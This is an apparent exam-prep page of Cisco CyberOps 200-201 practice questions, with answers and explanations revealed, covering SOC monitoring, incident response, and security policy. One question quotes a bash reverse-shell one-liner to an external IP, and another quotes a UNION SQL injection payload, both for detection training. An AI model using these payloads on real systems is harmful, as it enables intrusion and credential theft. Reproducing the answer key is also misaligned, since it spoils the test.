Courseiva

Cisco CyberOps Associate 200-201 (200-201) — Questions 601–675

968 questions total · 13pages · All types, answers revealed

Page 8

Page 9 of 13

Page 10
601
MCQeasy

A security analyst is reviewing the organization's security policy framework. The analyst notes that the policy defines the acceptable use of company assets, including computers, networks, and data. Which document typically outlines the rules for employee behavior when using these assets?

A.Service Level Agreement (SLA)
B.Non-Disclosure Agreement (NDA)
C.Incident Response Plan (IRP)
D.Acceptable Use Policy (AUP)
AnswerD

The Acceptable Use Policy (AUP) defines how employees may use company assets, including computers and networks. It sets expectations for behavior and consequences for violations. In this scenario, the AUP is the document that outlines these rules, making it the correct choice.

Why this answer

The Acceptable Use Policy (AUP) is designed to outline the rules and guidelines for using company assets. It typically covers what is allowed and prohibited, and the consequences of violations. This aligns with the scenario's requirement to define acceptable use of computers, networks, and data.

Exam trap

The trap here is confusing the AUP with other policies like the NDA, which also govern behavior but focus on confidentiality rather than asset use.

602
MCQeasy

Refer to the exhibit. An analyst runs tasklist /SVC on a suspected host. Which process is most suspicious?

A.svchost.exe with PID 1500
B.svchost.exe with PID 1240
C.notmalware.exe with PID 2300
D.svchost.exe with PID 1780
AnswerC

notmalware.exe is the suspicious entry because its name is absent from known Windows binaries, and tasklist /SVC maps each process to its hosted services. Legitimate service hosts (svchost.exe, services.exe) carry recognisable names, so an unknown executable with a running service is the anomaly.

Why this answer

'notmalware.exe' is a deliberately suspicious process name that does not correspond to any legitimate Windows system binary. The tasklist /SVC command displays processes and their associated services; a process named 'notmalware.exe' is a clear indicator of potential malware attempting to disguise itself with an ironic name, whereas svchost.exe is a legitimate Windows host process for services.

Exam trap

Cisco often tests the misconception that multiple svchost.exe processes are inherently suspicious, when in fact Windows normally runs many svchost instances, and the real red flag is a process with a clearly fabricated name like 'notmalware.exe'.

How to eliminate wrong answers

Option A is wrong because svchost.exe with PID 1500 is a legitimate Windows system process that hosts multiple services; its presence alone is not suspicious without additional indicators like unusual parent process or high resource usage. Option B is wrong because svchost.exe with PID 1240 is also a normal svchost instance; multiple svchost.exe processes are expected in Windows as each hosts one or more services. Option D is wrong because svchost.exe with PID 1780 is another legitimate svchost instance; the tasklist /SVC output shows these are associated with standard services, making them not inherently suspicious.

603
MCQhard

An analyst captures traffic and sees a high number of DNS queries for random subdomains under a single domain, all returning NXDOMAIN. This pattern is typical of which malicious activity?

A.DNS cache poisoning
B.DNS amplification attack
C.DNS tunneling
D.Domain generation algorithm (DGA) activity
AnswerD

DGA malware generates large volumes of pseudo-random subdomain queries, most of which fail because only a few are pre-registered by the attacker. The NXDOMAIN responses for random subdomains under one domain precisely match this rendezvous technique.

Why this answer

D is correct because a high volume of DNS queries for random subdomains under a single domain, all returning NXDOMAIN, is a classic indicator of Domain Generation Algorithm (DGA) activity. Malware uses DGA to generate thousands of pseudo-random domain names to contact a command-and-control (C2) server; the NXDOMAIN responses indicate that the generated domains are not yet registered or have been sinkholed.

Exam trap

Cisco often tests the distinction between DGA activity and DNS tunneling by emphasizing that DGA generates random, unresolvable subdomains (NXDOMAIN), while tunneling uses structured subdomains that typically receive valid responses (e.g., TXT records) to exfiltrate data.

How to eliminate wrong answers

Option A is wrong because DNS cache poisoning (e.g., a Kaminsky attack) injects forged DNS records into a resolver's cache to redirect traffic, not generate random subdomain queries that all return NXDOMAIN. Option B is wrong because a DNS amplification attack uses open resolvers to send large responses to a victim's spoofed IP, characterized by high traffic volume and large response sizes, not by random subdomain queries with NXDOMAIN replies. Option C is wrong because DNS tunneling encodes data (e.g., exfiltrated files) within DNS queries and responses, typically using structured subdomains and receiving non-NXDOMAIN replies (e.g., TXT records), not random subdomains that all fail resolution.

604
MCQhard

An analyst is triaging a Windows 10 host and finds a scheduled task named 'MicrosoftEdgeUpdateTaskMachineUA' that runs a PowerShell script from C:\Users\Public\update.ps1 every 30 minutes. The script base64-decodes a payload and calls Invoke-WebRequest to a remote host. Which action should the analyst take FIRST to preserve evidence while containing the threat?

A.Immediately reboot the host into Safe Mode to stop the PowerShell execution, then begin collecting forensic artifacts from the disk.
B.Run a full antivirus scan and allow it to quarantine any detected files, then review the scheduled task XML for indicators.
C.Delete the scheduled task and the update.ps1 file immediately, then capture a memory image of the host for offline analysis.
D.Capture volatile data including the running process list, network connections, and the contents of C:\Users\Public\update.ps1, then disable the scheduled task and isolate the host.
AnswerD

Volatile artifacts such as memory-resident processes, active network connections, and the malicious script file can disappear on reboot or be deleted by the attacker. Capturing them first preserves evidence for later analysis. Only after acquisition should the analyst disable the task and isolate the host to stop reinfection. This order follows the standard order of volatility principle in incident response.

Why this answer

The order of volatility dictates that the most perishable evidence (memory, network state, running processes) is captured before less volatile evidence (disk files) and before any remediation. Capturing the script, process list, and connections first preserves investigative value; disabling the task and isolating the host then stops the beaconing without destroying evidence. Reboots, AV quarantine, and deletion all destroy or alter artifacts needed to scope the compromise.

Exam trap

The trap here is jumping straight to remediation actions such as rebooting, deleting the task, or running antivirus, which destroy volatile evidence before it can be captured.

605
MCQhard

Which type of attack does this Snort alert most likely indicate?

A.Buffer overflow
B.SQL injection
C.Directory traversal
D.Cross-site scripting
AnswerC

Directory traversal attacks insert sequences such as ../ into requests to escape the web root and read files outside it. A Snort alert showing encoded dot-dot-slash patterns in HTTP URIs indicates this attempt to access unauthorised paths.

Why this answer

The Snort alert signature 'ET WEB_SERVER ATTACKS Directory Traversal Attempt' specifically detects patterns like '../' or encoded variants (e.g., '%2e%2e%2f') in HTTP requests. This indicates an attempt to access files outside the web root directory, which is the hallmark of a directory traversal attack. The alert triggers on the URI path, not on SQL syntax or script injection patterns.

Exam trap

Cisco often tests the ability to distinguish between web application attacks by focusing on the specific payload pattern in the alert signature, where candidates confuse directory traversal with SQL injection or XSS because all three involve HTTP requests.

How to eliminate wrong answers

Option A is wrong because a buffer overflow attack typically triggers alerts based on oversized payloads or specific shellcode patterns (e.g., NOP sleds, long strings in protocol fields), not directory traversal strings. Option B is wrong because SQL injection alerts would match SQL keywords like 'UNION', 'SELECT', or 'OR 1=1' in query parameters, not path traversal sequences. Option D is wrong because cross-site scripting alerts detect script tags (e.g., '<script>', 'onerror=') or encoded JavaScript in user input, not '../' path manipulation.

606
MCQmedium

A security analyst is reviewing NetFlow records exported from a Cisco router at the internet edge. During a suspected ransomware staging window, a single internal host shows a sustained outbound flow to one external IP on TCP 443 with 4.2 GB transferred over 40 minutes, while the host's normal baseline for that destination is under 5 MB per day. No corresponding proxy log entry exists for this session. Which conclusion is best supported by these records?

A.The flow confirms a denial-of-service attack because large outbound transfers consume bandwidth and degrade availability.
B.The flow is normal because TCP 443 is reserved for HTTPS and traffic on that port is always legitimate business use.
C.The flow represents encrypted command-and-control beaconing because beaconing is identified by high byte volume on port 443.
D.The records indicate probable data exfiltration or bulk upload over TLS, because the volume and duration are anomalous for that host and bypass the monitored proxy.
AnswerD

A single host pushing 4.2 GB to one external address in 40 minutes, hundreds of times above its own baseline, matches bulk outbound transfer behavior. The missing proxy log means the session did not traverse the inspected path, so content was likely TLS-encrypted and uninspected. NetFlow alone cannot prove exfiltration, but it strongly supports this hypothesis and warrants escalation.

Why this answer

NetFlow provides metadata such as byte counts, duration, ports, and endpoints without payload. When one host suddenly sends gigabytes to a single external address far above its baseline and no proxy record exists, the strongest supported hypothesis is bulk outbound transfer, consistent with exfiltration or staged upload. The absence of proxy inspection suggests the session avoided the monitored path, reinforcing the need to escalate and correlate with endpoint and DNS telemetry.

Exam trap

The trap here is assuming that traffic on TCP 443 is inherently safe because it is HTTPS, when the port number says nothing about whether the transfer is authorized or inspected.

607
MCQeasy

A security administrator is configuring a firewall rule set to control traffic between the corporate network and the internet. The policy states that only web browsing (HTTP and HTTPS) should be allowed outbound, and all other outbound traffic should be denied. Which type of security control is this an example of?

A.Preventive control
B.Detective control
C.Compensating control
D.Corrective control
AnswerA

A preventive control is designed to stop unwanted actions or events before they occur. By explicitly allowing only HTTP and HTTPS outbound and denying all other traffic, the firewall rule set prevents unauthorized outbound connections. This aligns with the definition of a preventive control, as it blocks potentially malicious or non-compliant traffic from leaving the network.

Why this answer

The firewall rule set is a preventive control because it enforces the policy by blocking all outbound traffic except HTTP and HTTPS before it can leave the network. Preventive controls are proactive measures that stop unwanted actions. Detective controls identify events, corrective controls remediate after incidents, and compensating controls are alternatives when primary controls are not feasible.

Exam trap

The trap here is confusing logging or alerting features of a firewall with its primary function, which in this scenario is to block traffic, making it preventive.

608
MCQhard

In a PCAP, an analyst sees an interactive shell session over TCP with irregular command prompts and responses. Which tool was likely used to generate this traffic?

A.File transfer tool
B.Port scanner
C.Reverse shell payload
D.SQL injection tool
AnswerC

A reverse shell payload initiates the TCP connection from the compromised host back to the attacker, then carries an interactive command session. The irregular prompts and responses in the PCAP reflect that outbound, attacker-controlled shell rather than a legitimate client-server protocol.

Why this answer

A reverse shell payload is the correct answer because it establishes an interactive shell session where the target machine connects back to the attacker's machine, allowing the attacker to execute commands. In a PCAP, this appears as a TCP session with irregular command prompts and responses, often with small packet sizes and interactive timing. The traffic may not follow standard protocol patterns, and the commands/responses are human-readable or encoded.

Exam trap

200-201 often tests the ability to distinguish between different types of network traffic, so candidates must recognize that an interactive shell session with command prompts is characteristic of a reverse shell, not a file transfer, port scan, or SQL injection.

How to eliminate wrong answers

Option A is wrong because a file transfer tool would generate traffic with large data transfers and specific protocols like FTP or SMB, not an interactive shell with command prompts. Option B is wrong because a port scanner generates many connection attempts to different ports with SYN packets, not an established interactive session with command/response patterns. Option D is wrong because SQL injection tools typically target web applications over HTTP and would show SQL queries in HTTP requests, not an interactive shell session over TCP.

609
Multi-Selecthard

Which TWO of the following are best practices when configuring a SIEM correlation rule to detect lateral movement?

Select 2 answers
A.Include a time window to limit the correlation to a few minutes between events.
B.Exclude the source IP address from the correlation to focus on user identity.
C.Use only a single log source, such as domain controller logs, to simplify the rule.
D.Set the rule to trigger on any Event ID 4624 (successful logon) regardless of type.
E.Correlate successful logons across different systems from the same user within a short time window.
AnswersA, E

Lateral movement generates a sequence of related events across hosts within a short period. Constraining the correlation to a few minutes ensures those events are linked as one incident, satisfying the rule's detection requirement while avoiding false positives from unrelated activity spread over hours.

Why this answer

Option A is correct because lateral movement generates a rapid sequence of related events (for example, a logon on host A followed almost immediately by a logon on host B), so constraining the correlation with a short time window of a few minutes sharply reduces false positives from unrelated logons that occur hours or days apart. Option E is correct because the core detection logic for lateral movement is correlating successful logons (Event ID 4624, especially Type 3 network and Type 10 RemoteInteractive) for the same user account across multiple distinct systems within a brief interval, which reveals an account authenticating to hosts it would not normally touch. The unmarked options do not belong: B is wrong because source IP is a key indicator of lateral movement and excluding it weakens the rule; C is wrong because relying on a single log source such as domain controller logs misses local and remote logons recorded on member servers and workstations; and D is wrong because triggering on every Event ID 4624 regardless of logon type produces massive noise, since Type 2 interactive and Type 5 service logons are routine and unrelated to lateral movement.

Exam trap

Cisco often tests the misconception that any successful logon (Event ID 4624) is suspicious, when in fact only specific logon types and patterns (e.g., multiple logons from the same user across different systems in a short time) indicate lateral movement.

610
MCQhard

A mid-sized financial firm has a segmented network with a DMZ hosting a web server, an internal network with a database server, and an employee LAN. The security infrastructure includes a next-generation firewall (NGFW) with IPS, an endpoint detection and response (EDR) solution, and a SIEM. Over the past week, the SIEM has generated alerts for unusual outbound connections from the database server to an external IP address 198.51.100.33 on TCP port 443 during non-business hours. The EDR shows no malware on the database server, but a process named 'sqlsrv.exe' (the legitimate SQL Server process) is making these connections. The server's file integrity monitoring indicates that the sqlsrv.exe file has not been modified, but a memory dump reveals injected code that appears to be a reverse shell. The firewall logs show that the outbound connections are allowed because they match an existing rule permitting the database server to reach external update servers. The IP 198.51.100.33 is not on any threat intelligence feed as malicious, but it is geolocated to a country with known cybercrime activity. Which action should the security analyst take FIRST?

A.Isolate the database server from the network immediately to prevent data exfiltration.
B.Contact the software vendor to verify the digital signature of sqlsrv.exe.
C.Add a firewall rule to block outbound connections to 198.51.100.33.
D.Run a full antivirus scan on the database server using an updated signature database.
AnswerA

Isolating the host halts the injected reverse shell's command-and-control channel and any exfiltration, containing an active compromise confirmed by the memory dump. The legitimate process name and clean file hash indicate fileless injection, so network isolation takes priority over further triage or blocking the single external IP.

Why this answer

The presence of injected reverse shell code in the memory of the legitimate sqlsrv.exe process indicates that the database server is actively compromised, regardless of the file integrity or EDR results. The immediate priority is to contain the threat by isolating the server from the network to prevent data exfiltration or lateral movement, as per incident response best practices (NIST SP 800-61).

Exam trap

The trap here is that candidates focus on the unchanged file hash or lack of malware alerts and choose a slower investigative step (like scanning or vendor contact), instead of recognizing that memory-resident code injection is an active compromise requiring immediate isolation.

How to eliminate wrong answers

Option B is wrong because verifying the digital signature of sqlsrv.exe is irrelevant; the file itself is unmodified, but the attack is via code injection into the running process, not file tampering. Option C is wrong because adding a firewall rule to block only the specific IP 198.51.100.33 is insufficient; the attacker could easily switch to a different C2 IP, and the immediate containment action should be network isolation. Option D is wrong because running a full antivirus scan is a secondary step; the EDR already shows no malware, and the attack is memory-resident (injected code), which may evade signature-based scans, so isolation must come first.

611
MCQhard

An analyst investigates a Linux web server and finds a bash process spawned by the Apache user, with its parent process being httpd. The bash process has an outbound connection to an external IP on port 443, and the server's audit log shows the command 'bash -i >& /dev/tcp/198.51.100.22/443 0>&1'. Which security monitoring technique most reliably detects this specific attack pattern across the environment?

A.NetFlow analysis for long-duration connections from the web server
B.Signature-based network intrusion detection for outbound TLS to port 443
C.File integrity monitoring on the Apache document root directories
D.Endpoint process lineage and command-line monitoring for shell spawning from web server processes
AnswerD

The attack is defined by httpd spawning bash with a reverse shell command line, which endpoint telemetry captures directly. Monitoring process lineage and command-line arguments detects this pattern regardless of the destination IP or port, making it robust against infrastructure changes. This technique also generalizes to similar web shell and reverse shell abuses across the environment.

Why this answer

The attack signature is a web server process spawning an interactive shell that opens an outbound connection, captured in the process tree and command line. Endpoint process lineage and command-line monitoring detects this directly and does not depend on the external IP or port. Network signatures, file integrity monitoring, and flow analysis lack the process context needed to reliably isolate this behavior.

Exam trap

The trap here is focusing on the outbound connection to port 443 and building a network signature, when the decisive evidence is the shell process spawned by the web server.

612
MCQmedium

A Windows system's security log shows Event ID 4720 followed by 4726 for the same username within minutes. What does this sequence indicate?

A.A user changed their password.
B.The account was successfully logged on.
C.A group membership was changed.
D.An account was created and then deleted, possibly for short-term unauthorized access.
AnswerD

Event ID 4720 logs account creation and 4726 logs account deletion. Occurring minutes apart for the same username, the pair indicates an account was provisioned then removed, a pattern consistent with an attacker creating a temporary backdoor account for short-lived unauthorised access.

Why this answer

Event ID 4720 indicates a user account was created, and 4726 indicates it was deleted. The short interval suggests the account was created for temporary access, possibly malicious, and then removed to cover tracks.

Exam trap

The trap is confusing account creation/deletion events with other account-related events like password changes or logons, leading to incorrect interpretation.

How to eliminate wrong answers

Option A is wrong because password changes generate Event ID 4723 or 4724. Option B is wrong because successful logons generate Event ID 4624. Option C is wrong because group membership changes generate Event IDs 4728, 4732, etc.

613
MCQhard

During a PCAP analysis, a security analyst notices an HTTP request with the URI parameter 'id=1 UNION SELECT username,password FROM users--'. What is the most likely attack being attempted?

A.Command injection
B.Cross-site scripting (XSS)
C.Directory traversal
D.SQL injection
AnswerD

The payload 'UNION SELECT username,password FROM users--' appends a second query to the original, harvesting credential columns and commenting out the remainder. This is textbook SQL injection, exploiting unsanitised input in the 'id' parameter to exfiltrate database contents.

Why this answer

The payload 'id=1 UNION SELECT username,password FROM users--' is a classic SQL injection attempt. It uses a UNION operator to combine the original query with a malicious one that extracts sensitive data from the users table, and the double dash comments out the rest of the original query.

Exam trap

The trap is misidentifying the attack as XSS or command injection due to the presence of SQL keywords, especially if the analyst is not familiar with SQL syntax.

How to eliminate wrong answers

Option A is wrong because command injection targets OS commands, not database queries. Option B is wrong because XSS involves injecting client-side scripts, not SQL. Option C is wrong because directory traversal attempts to access files outside the web root, typically using '../' sequences.

614
MCQeasy

In the MITRE ATT&CK framework, TTPs are mapped to:

A.Vulnerability databases
B.Compliance standards
C.Network protocols
D.Real-world threat groups
AnswerD

MITRE ATT&CK maps tactics, techniques and procedures to documented real-world threat groups, satisfying the framework's purpose of describing adversary behaviour rather than isolated indicators. Each group entry links specific techniques to observed campaigns, enabling defenders to prioritise detections against actors actually targeting their sector.

Why this answer

MITRE ATT&CK maps Tactics, Techniques, and Procedures (TTPs) to specific real-world threat groups (also called Advanced Persistent Threats or APTs). Each technique page in ATT&CK lists the known threat actors that have been observed using it, allowing defenders to attribute behaviors and prioritize defenses against groups targeting their industry. This threat-group-centric mapping is what distinguishes ATT&CK from a pure technique catalog.

Exam trap

200-201 often tests the misconception that ATT&CK is a vulnerability or compliance framework, when it is actually a behavioral knowledge base whose TTPs are mapped to real-world threat groups.

How to eliminate wrong answers

Option A is wrong because vulnerability databases (such as CVE/NVD) catalog software flaws, not adversary behaviors — ATT&CK does not map TTPs to CVEs. Option B is wrong because compliance standards (PCI-DSS, HIPAA, ISO 27001) are governance frameworks, not adversary behavior repositories, and ATT&CK mappings to controls are a separate downstream exercise. Option C is wrong because network protocols (TCP, HTTP, SMB) are technical communication standards; ATT&CK techniques may abuse protocols but TTPs are not mapped to protocol specifications.

615
MCQeasy

A company's data classification policy defines "Confidential" data. Which of the following is an example of Confidential data?

A.Public marketing brochures
B.Customer payment card information
C.Company cafeteria menu
D.Employee phone numbers
AnswerB

Customer payment card information is regulated by PCI DSS, making it a canonical example of Confidential data under any classification policy. Unlike internal-only or public data, card numbers, expiry dates and CVVs demand encryption, restricted access and breach notification, directly satisfying the stem's Confidential classification requirement.

Why this answer

Customer payment card information (PCI) is classified as Confidential data because it is subject to regulatory compliance (e.g., PCI DSS) and its unauthorized disclosure could cause significant financial or reputational harm. Confidential data typically includes personally identifiable information (PII), financial records, and trade secrets that require strict access controls and encryption at rest and in transit.

Exam trap

Cisco often tests the distinction between 'Confidential' and 'Internal' data, where candidates mistakenly classify any non-public information (like employee phone numbers) as Confidential, ignoring the higher sensitivity and regulatory impact required for Confidential classification.

How to eliminate wrong answers

Option A is wrong because public marketing brochures are intended for unrestricted distribution and contain no sensitive information, so they fall under Public or Unclassified data. Option C is wrong because a company cafeteria menu is operational, non-sensitive information that poses no risk if disclosed, typically classified as Internal or Public. Option D is wrong because employee phone numbers, while possibly considered internal, are often classified as Internal or Private but not Confidential unless combined with other sensitive data; they lack the regulatory or financial impact that defines Confidential data.

616
MCQmedium

A security engineer reviews syslog data and sees multiple authentication failures from a single source IP to different SSH servers. The source IP is internal. What does this indicate?

A.Brute-force attack
B.User error
C.Misconfigured client
D.Network scan
AnswerA

Repeated authentication failures from one internal IP against multiple SSH servers show automated credential guessing across targets. The single source, high volume and spread across hosts distinguish brute-force attempts from isolated user error or a single compromised account.

Why this answer

Multiple authentication failures from a single internal source IP to different SSH servers is a classic indicator of a brute-force attack. The attacker is systematically attempting to guess credentials across multiple targets, which is distinct from a single misconfiguration or user error. This pattern is commonly seen in post-compromise lateral movement or initial foothold attempts within the network.

Exam trap

Cisco often tests the distinction between a network scan (which only checks for open ports) and an actual authentication attack (which generates syslog auth failures), causing candidates to confuse the two.

How to eliminate wrong answers

Option B is wrong because user error typically results in repeated failures to a single server (e.g., mistyped password), not to multiple different SSH servers from the same IP. Option C is wrong because a misconfigured client would likely fail authentication to a specific server due to key mismatch or protocol version, not generate failures across multiple distinct servers. Option D is wrong because a network scan (e.g., using Nmap) would probe for open ports (TCP 22) without attempting SSH authentication, so it would not produce authentication failure logs.

617
Multi-Selecthard

A hospital's security team is updating its data handling policy. The compliance officer asks which two classification labels are most appropriate for a patient's electronic protected health information (ePHI) under a typical data classification scheme aligned with HIPAA expectations. (Choose two.)

Select 2 answers
A.Confidential
B.Internal Use Only
C.Unclassified
D.Public
E.Restricted
AnswersA, E

Confidential is widely used for sensitive personal or business data requiring protection from unauthorized disclosure, and ePHI commonly falls into this tier when an organization uses a three- or four-level scheme. Labeling ePHI as Confidential ensures encryption, access controls, and handling rules apply, and it aligns with HIPAA's expectation that protected health information be safeguarded. It is therefore an appropriate classification label alongside Restricted.

Why this answer

In a typical data classification scheme, ePHI belongs in the highest sensitivity tiers because unauthorized disclosure causes regulatory penalties and patient harm. Restricted and Confidential are the two labels that mandate encryption, strict access control, and handling procedures consistent with HIPAA. Public, Internal Use Only, and Unclassified all imply weaker or no protections, so they cannot be applied to patient health information in this policy.

Exam trap

The trap here is treating Internal Use Only as sufficient for regulated health data simply because ePHI should stay inside the organization.

618
MCQeasy

During which phase of the NIST SP 800-61 Rev 2 incident response process should an organization develop and exercise the incident response plan?

A.Preparation
B.Post-Incident Activity
C.Detection and Analysis
D.Containment, Eradication, and Recovery
AnswerA

Preparation is the phase where organisations build incident response capability before incidents occur, including developing the plan, defining roles, and conducting exercises. NIST SP 800-61 Rev 2 places plan creation and training squarely here, satisfying the stem's requirement to both develop and exercise the plan ahead of any detection or containment activity.

Why this answer

The Preparation phase of NIST SP 800-61 Rev 2 covers establishing the incident response capability, including developing the IR plan, acquiring tools, training staff, and exercising the plan through tabletop and functional exercises. Exercising the plan before an incident occurs is explicitly a Preparation activity, not something done during or after an event.

Exam trap

The trap here is confusing 'exercising the plan' with 'improving the plan after an incident' — candidates often pick Post-Incident Activity because both involve the plan, but only Preparation covers initial development and drills.

How to eliminate wrong answers

Option B is wrong because Post-Incident Activity focuses on lessons learned and improving the plan after an incident, not on developing and exercising it initially. Option C is wrong because Detection and Analysis is where the team identifies and scopes an active incident, not where the plan is authored or drilled. Option D is wrong because Containment, Eradication, and Recovery is the execution phase where the plan is applied to a live incident, not where it is developed or exercised.

619
MCQeasy

Which protocol and port combination is used by SNMP for receiving traps?

A.TCP 161
B.UDP 161
C.UDP 162
D.TCP 162
AnswerC

SNMP traps are unsolicited notifications pushed by agents to a manager, so the manager must listen on a dedicated port rather than the agent's UDP 161. UDP 162 satisfies this scenario's requirement for receiving traps, since trap delivery is fire-and-forget over UDP with no acknowledgement or session setup.

Why this answer

SNMP traps are unsolicited notifications sent from an SNMP agent to the network management system (NMS) to alert it of significant events. The correct protocol and port combination for receiving SNMP traps is UDP port 162, as defined in RFC 1157. UDP is used because traps are lightweight, connectionless messages where reliability is handled by the application layer if needed.

Exam trap

Cisco often tests the distinction between UDP port 161 (for SNMP queries) and UDP port 162 (for SNMP traps), and the trap here is that candidates confuse the port numbers or incorrectly assume SNMP uses TCP for traps due to familiarity with TCP-based protocols like HTTP or SSH.

How to eliminate wrong answers

Option A is wrong because TCP port 161 is used for SNMP queries (GET, GETNEXT, SET) from the manager to the agent, not for receiving traps, and SNMP typically uses UDP, not TCP. Option B is wrong because UDP port 161 is the standard port for SNMP agent communication (queries and responses), not for trap reception. Option D is wrong because TCP port 162 is not used for SNMP traps; SNMP traps always use UDP port 162, as TCP's connection-oriented overhead is unnecessary for one-way trap delivery.

620
MCQhard

An organization is implementing monitoring for encrypted traffic without decrypting it. Which approach would be most effective for detecting malicious activity?

A.Deploy SSL/TLS inspection to decrypt traffic
B.Use NetFlow analysis to identify unusual connection patterns
C.Monitor SNMP traffic from endpoints
D.Block all encrypted traffic except from known good sources
AnswerB

NetFlow records flow metadata — source, destination, ports, volume, timing — without payload inspection, so it works on encrypted traffic where decryption is prohibited. Anomalous patterns such as beaconing, unusual volumes or rare port pairs reveal malicious activity that content inspection cannot reach.

Why this answer

NetFlow analysis examines metadata (source/destination IPs, ports, protocols, byte counts) without decrypting the payload. Unusual patterns like beaconing to a known C2 server, data exfiltration via non-standard ports, or unexpected volumetric flows can indicate malicious activity even when the traffic is encrypted. This approach preserves privacy and compliance while still enabling threat detection through behavioral anomalies.

Exam trap

Cisco often tests the distinction between 'monitoring without decryption' and 'decryption-based inspection'—the trap is that candidates assume encrypted traffic is invisible to security tools, but metadata analysis (NetFlow) can reveal malicious patterns without ever seeing the plaintext.

How to eliminate wrong answers

Option A is wrong because SSL/TLS inspection decrypts the traffic, which violates the requirement to monitor without decrypting and introduces privacy, compliance, and performance overhead. Option C is wrong because SNMP traffic is used for network device management (e.g., polling OIDs for interface stats, CPU load) and does not provide visibility into encrypted session metadata or connection patterns between endpoints. Option D is wrong because blocking all encrypted traffic except from known good sources is overly restrictive, breaks legitimate encrypted services (e.g., HTTPS, VPNs), and is not a monitoring approach—it is an access control policy that fails to detect malicious activity within allowed encrypted flows.

621
MCQeasy

Which Windows Event ID is recorded when a user account is created, indicating potential unauthorized account creation?

A.4726
B.4648
C.4624
D.4720
AnswerD

Event ID 4720 is logged in the Windows Security log whenever a user account is created. Monitoring for it surfaces unauthorised account creation, since legitimate provisioning should be attributable to known administrators or automated processes.

Why this answer

Windows Security Event ID 4720 is logged when a user account is created. It is a key indicator for detecting unauthorized account creation, which attackers use for persistence and privilege escalation. This directly matches the question.

Exam trap

200-201 often tests Windows Event ID memorization — candidates confuse 4720 (account created) with 4726 (account deleted) or 4624 (logon), so precise ID-to-action mapping is essential.

How to eliminate wrong answers

Option A is wrong because Event ID 4726 records user account deletion, not creation. Option B is wrong because Event ID 4648 indicates a logon attempt using explicit credentials (e.g., runas), which is a credential-use event, not account creation. Option C is wrong because Event ID 4624 records a successful logon, which is authentication activity, not account creation.

622
Multi-Selectmedium

Which THREE of the following are best practices for creating and maintaining security policies? (Choose three.)

Select 3 answers
A.Develop policies in isolation by the security team.
B.Obtain approval from senior management.
C.Provide training on policies to all employees.
D.Review and update policies annually.
E.Store policies in a secure location accessible only to security staff.
AnswersB, C, D

Senior management approval secures the authority and budget needed for enforcement, satisfying the governance requirement that policies carry organisational weight. Without executive endorsement, security policies lack the mandate to compel compliance across departments, making this a recognised best practice for establishing and maintaining them.

Why this answer

Option B is correct because security policies derive their authority from executive endorsement; obtaining approval from senior management ensures the policies are formally sanctioned, funded, and enforceable across the organization. Option C is correct because policies are only effective if the people they govern understand them, so providing training on policies to all employees ensures awareness, accountability, and consistent compliance. Option D is correct because reviewing and updating policies annually keeps them aligned with changes in business operations, technology, regulations, and threat landscape, preventing outdated or ineffective controls.

Option A is not a best practice because developing policies in isolation by the security team excludes key stakeholders such as legal, HR, IT, and business units, reducing practicality and buy-in. Option E is not a best practice because storing policies in a secure location accessible only to security staff undermines the need for organization-wide visibility, awareness, and training that make policies effective.

Exam trap

Cisco often tests the misconception that security policies should be restricted to security staff only, but the correct approach is that policies must be accessible to all employees to ensure awareness and compliance.

623
MCQeasy

An organization's security policy specifies that all configuration changes must be approved through a change management process. An analyst discovers that a firewall rule was added without approval. What is the appropriate action?

A.Remove the rule immediately.
B.Change the policy to allow emergency changes without approval.
C.Report the unauthorized change to management.
D.Document the change and ignore it.
E.Analyze the rule to see if it's needed, then either approve or remove.
AnswerC

Reporting the unauthorised firewall rule to management satisfies the policy's change management requirement, since the rule bypassed the approval process entirely. The analyst's role is to detect and escalate, not remediate; management must review the change and decide whether to authorise, reverse or investigate it further.

Why this answer

The appropriate action is to report the unauthorized change to management, as per the change management process. Removing the rule immediately could disrupt legitimate business operations, and documenting and ignoring it violates policy. The analyst should follow the established process for handling unauthorized changes.

Exam trap

200-201 often tests the correct response to policy violations, and candidates may choose to remove the rule immediately or ignore it, rather than following the reporting process.

How to eliminate wrong answers

Option A is wrong because removing the rule immediately without approval could cause outages and is not following change management. Option B is wrong because changing the policy to allow emergency changes without approval undermines the change management process. Option D is wrong because documenting and ignoring the change does not address the policy violation.

Option E is wrong because analyzing the rule and then approving or removing it is not the analyst's role; it should be reported to management for a decision.

624
Multi-Selectmedium

A SOC analyst is investigating a potential data exfiltration incident. Which TWO indicators from NetFlow/IPFIX analysis would most strongly suggest data exfiltration?

Select 2 answers
A.Consistent traffic at regular intervals to an external IP
B.Connection to an IP address flagged as malicious in threat intelligence
C.Multiple connection attempts to various ports on the same external IP
D.High volume of data transferred to a single external IP address
E.Low volume of traffic to multiple external IPs
AnswersB, D

A flow to an IP listed in threat intelligence links internal traffic to known malicious infrastructure, a strong exfiltration indicator. Unlike volume alone, this reputation match ties the connection to adversary-controlled endpoints, satisfying the requirement for corroborating evidence of compromise.

Why this answer

Option B is correct because a NetFlow/IPFIX record showing a connection to an IP address flagged as malicious by threat intelligence directly ties the flow to known adversary infrastructure, which is a strong contextual indicator of exfiltration (or command-and-control) rather than benign traffic. Option D is correct because a high volume of data transferred outbound to a single external IP address is a classic exfiltration signature — large byte/packet counts in one direction toward an external destination indicate bulk data movement, consistent with stolen data being sent to an attacker-controlled host. Option A is not the strongest indicator here because consistent traffic at regular intervals more typically suggests beaconing/C2 check-ins than bulk exfiltration, and it can also reflect legitimate scheduled traffic.

Option C does not belong because multiple connection attempts to various ports on the same external IP is characteristic of port scanning or reconnaissance, not data exfiltration. Option E does not belong because low-volume traffic to multiple external IPs is more consistent with normal web browsing or DNS activity and lacks the volume and concentration expected in exfiltration.

Exam trap

200-201 often tests the difference between C2 beaconing (regular small flows) and exfiltration (large outbound volume) — the trap is picking 'consistent intervals' when the question asks about data exfiltration specifically.

625
Multi-Selectmedium

Which TWO of the following are typically included in a security policy's scope statement?

Select 2 answers
A.Threat intelligence sources to be used
B.Encryption algorithms to be used
C.List of systems and networks covered
D.User roles and responsibilities affected
E.Minimum password length requirements
AnswersC, D

A scope statement must define the boundaries of the policy, so listing the systems and networks covered satisfies that requirement by making clear which assets fall under the policy's controls and which sit outside them.

Why this answer

The scope statement of a security policy defines what the policy applies to, so option C ("List of systems and networks covered") is correct because it explicitly identifies the in-scope assets, such as specific hosts, subnets, or business units, which is the primary purpose of a scope statement. Option D ("User roles and responsibilities affected") is also correct because scope must identify the people and organizational roles the policy binds, such as employees, contractors, or administrators, so accountability and applicability are unambiguous. By contrast, option A (threat intelligence sources) is an operational input typically addressed in monitoring or intelligence procedures, not in the policy scope.

